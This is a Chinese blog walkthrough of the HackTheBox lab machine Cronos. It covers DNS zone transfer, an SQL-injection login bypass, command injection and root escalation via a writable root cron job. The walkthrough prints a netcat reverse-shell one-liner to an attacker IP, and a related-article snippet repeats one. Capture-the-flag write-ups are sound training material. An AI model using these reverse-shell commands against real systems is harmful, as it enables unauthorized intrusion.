No.97-HackTheBox-Linux-Cronos-Walkthrough渗透学习

最新推荐文章于 2024-05-27 14:14:58 发布
最新推荐文章于 2024-05-27 14:14:58 发布
阅读量328 收藏
点赞数
分类专栏: Hack The box 文章标签: java python linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/106115168
版权

**

HackTheBox-Linux-Cronos-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/11
靶机难度:初级(4.5/10)
靶机发布日期:2017年10月13日
靶机描述:
CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability.

作者:大余
时间:2020-05-14

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.13…
在这里插入图片描述
Nmap发现了一个OpenSSH服务器,一个DNS服务器和一个Apache服务器…
在这里插入图片描述
这里应该是存在子域名信息…
在这里插入图片描述
尽管必须猜测初始域名cronos.htb,可以通过进行区域传输来枚举其余的子域,将cronos.htb添加到/etc/hosts文件后,使用dig发现了admin…域名…继续添加即可…
在这里插入图片描述
通过获得的子域名,添加到hosts后,访问是登陆页面…
在这里插入图片描述
在这里插入图片描述
通过测试…存在sql注入…简单的注入登陆进来了…是一个cmd类似的命令框架…这就直接提权即可…
在这里插入图片描述
命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.51 4444 >/tmp/f
直接一句话提权输入…获得了低权shell,成功获得user信息…
在这里插入图片描述
利用https://github.com/rebootuser/LinEnum工具上传枚举linux服务器所有信息…
在这里插入图片描述
通过集体枚举,查看到crontab每分钟以root身份执行/var/www/laravel/artisan…并且进入查看后具有写入等功能…
在这里插入图片描述
这里我直接利用kali自导的shell覆盖提权…成功获得了root信息…(常规操作)
或者还可以echo写入shell命令,等等方式提权,随便怎么弄…

当然还可以在/var/www/admin/config里头查看到mysql账号密码…通过访问数据库获得admin的哈希密码…爆破即可…需要时间…

由于我们已经成功得到root权限查看user和root.txt,因此完成这台简单的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
专栏目录
hackthebox-cronos(考点:dns/sql注入/crontab)
冬萍子癸水
04-11 370
nmap 看到53端口就应该想到dns,在/etc/hosts/里加上10.10.10.13 cronos.htb 然后再打开80,进入 cronos.htb。看看网页。以及dirbuster扫,但都没什么有价值的信息。 没啥突破口啊。继续信息搜集。 看来针对端口53,还要再利用 dig axfr @10.10.10.13 cronos.htb host -l cronos.htb 10.10...
HackTheBox | Cronos
Purpose_7的博客
03-17 213
HackTheBox | Cornos
Cronos -- hack the box
neal1991的专栏
03-15 361
IntroductionTarget machine: 10.10.10.13(OS: linux)Kali linux: 10.10.16.44EnumerationF...
Hack the box靶机 cronos
菜浪马废的博客
05-19 406
添加10.10.10.13 cronos.htb 到/etc/hosts 同样添加到/etc/hosts 访问一下 直接绕过了 一看就是远程命令执行 抓包 确认完毕 上nc 10.10.14.8 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.118 1234 >/tmp/f root用户在运行artisan 写个PHP脚本 替换它 然后连接 我用的php-rever.
HackTheBox-Machines--Cronos
最新发布
七天
05-27 468
Cronos 测试过程。
vixie-cron-4.1.rar_centos-s002_crontab source code_vixie-cron_vi
07-15
《vixie-cron-4.1:CentOS下的crontab定时任务源代码解析》 在Linux系统中,crontab是用于设置周期性被执行的任务的工具,它源自著名的Unix系统工具cron。Vixie-croncron的一个实现版本,由Paul Vixie开发,广泛...
wordpress定时任务(wp-cron.php)造成主机CPU比较高的解决办法
09-28
WordPress中的定时任务功能主要依赖于wp-cron.php文件,这是一个内置的模拟Linux系统cron job的机制。当WordPress检测到有用户访问网站时,它会检查是否有预定的任务需要执行。这种设计使得WordPress能够在没有实际...
man-db-cron-2.7.6.1-18.el8.noarch(1).rpm
12-05
官方离线安装包,亲测可用
man-db-cron-2.7.6.1-17.el8.noarch.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
cron-parser:用于解析crontab指令的Node.js库
04-27
npm install cron-parser 支持格式 * * * * * * ┬ ┬ ┬ ┬ ┬ ┬ │ │ │ │ │ | │ │ │ │ │ └ day of week (0 - 7) (0 or 7 is Sun) │ │ │ │ └───── month (1 - 12) │ │ │ └───────...
cronosparser:CronosPro CronosPlus 数据库文件的解析器
05-30
cronosparser 地位 截至 2020 年末, cronosparser已在以下方面cronosparser破坏: cronosparser只成功解码了我们拥有的大约 20-30% 的数据库,并且只有使用 Cronos 3 生成的数据库。 对于这个问题,我们很乐意收到解决这些问题的拉取请求。 我们目前没有时间表或计划自己解决问题。 关于cronosparser 该存储库包含一些 WIP 代码,用于对俄语 CronosPro/CronosPlus 数据库系统使用的 Cronos 数据库文件进行逆向工程,以及一些示例数据库。 功能缺失 可以绕过密码保护吗? 参考
【Hack The Boxlinux练习-- Cronos
人间体佐菲的博客
11-09 208
【Hack The Boxlinux练习-- Cronos
HackTheBoxCronos笔记
X
04-19 1283
HackTheBoxCronos笔记 HackTheBoxCronos WalkthroughHackTheBoxCronos笔记信息收集NMAP53端口:获得域名80端口:Laravel -> DNS Zone Transfer -> Admin域传送漏洞digNmapnslookup反弹shell提权定时任务反思与总结reference 信息收集 NMAP # nmap...
HackTheBox - Cronos Write Up
ak.Gh0st的博客
04-03 233
HackTheBox - Cronos Write Up
Hackthebox------Jerry
大方子
11-24 3061
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Cronos:时间调度的艺术,掌握你的任务计划
gitblog_00028的博客
04-10 362
Cronos:时间调度的艺术,掌握你的任务计划 CronosFully-featured .NET library for working with Cron expressions. Built with time zones in mind and intuitively handles daylight saving time transitions项目地址:https://gitcode...
Cronos:智能定时任务管理器,让自动化触手可及
gitblog_00011的博客
04-17 388
Cronos:智能定时任务管理器,让自动化触手可及 项目地址:https://gitcode.com/Idov31/Cronos 项目简介 Cronos 是一个开源的、基于Python的定时任务管理系统。它允许开发者和非开发者通过简单的配置文件创建复杂的定时任务,用于自动执行一系列操作,如数据抓取、备份、脚本运行等,将日常重复工作自动化。 技术分析 Cronos的核心是基于Unix的crontab...
Hack The Box -----------------------Active
大方子
12-16 6950
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
Cacti安装详细步骤
一条鱼 + 一条鱼
07-10 408
一、cacti概述 1. cacti是用php语言实现的一个软件,它的主要功能是用snmp服务获取数据,然后用rrdtool储存和更新数据,当用户需要查看数据的时候用rrdtool生成图表呈现给用户。因此,snmp和rrdtool是cacti的关键。Snmp关系着数据的收集,rrdtool关系着数据存储和图表的生成。 2. Mysql配合PHP程序存储一些变量数据并对变量数据进行调用,如...
深入学习HP-UX系统管理:从基础到高级
系统备份策略防止数据丢失,通过cron计划任务自动化日常维护,以及HPCluster的简介,涉及集群计算和高可用性解决方案。 通过学习这门全面的HP-UX系统管理课程,学习者不仅可以掌握操作系统的基本操作,还能深入了解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值